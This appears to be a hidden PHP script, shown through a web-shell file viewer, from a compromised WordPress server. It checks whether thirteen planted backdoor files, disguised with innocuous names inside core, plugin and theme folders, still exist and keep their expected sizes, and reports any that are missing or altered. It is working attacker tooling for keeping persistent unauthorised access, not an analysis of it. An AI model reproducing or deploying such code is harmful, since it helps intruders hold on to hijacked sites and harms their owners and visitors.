Current File : //dev/shm/.obj
<?php   $r = '/home/afrojfng/aurummedgh.com'; $x = ["/wp-includes/SimplePie/library/SimplePie/HTTP/sessionWrite.php"=>"bd@@205149@@588",
"/wp-includes/sodium_compat/src/Core32/ChaCha20/wish_list.php"=>"bd@@215152@@1638",
"/wp-includes/blocks/preformatted/alertpay_success.php"=>"bd@@204150@@579",
"/wp-includes/SimplePie/src/Content/Type/logoff.php"=>"bd@@207735@@637",
"/wp-content/plugins/extendify/app/HelpCenter/settings.php"=>"bd@@215159@@1600",
"/wp-includes/SimplePie/library/SimplePie/ArraySmarty.php"=>"bd@@215161@@1739",
"/wp-includes/blocks/post-template/server_databases.php"=>"bd@@215164@@689",
"/wp-includes/sodium_compat/src/Core/AEGIS/xoops.inc.php"=>"bd@@205186@@1585",
"/wp-includes/sodium_compat/src/Core/SecretStream/HighlightPhp.php"=>"bd@@207747@@1687",
"/wp-content/themes/twentytwentyone/template-parts/footer/footer.widgets.php"=>"bd@@205207@@2683",
"/wp-content/plugins/litespeed-cache/tpl/cache/network.settings.cache.php"=>"bd@@205215@@712",
"/wp-content/plugins/litespeed-cache/tpl/general/online.inc.php"=>"bd@@205222@@588",
"/wp-includes/SimplePie/src/Net/account_details.php"=>"bd@@207813@@653"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');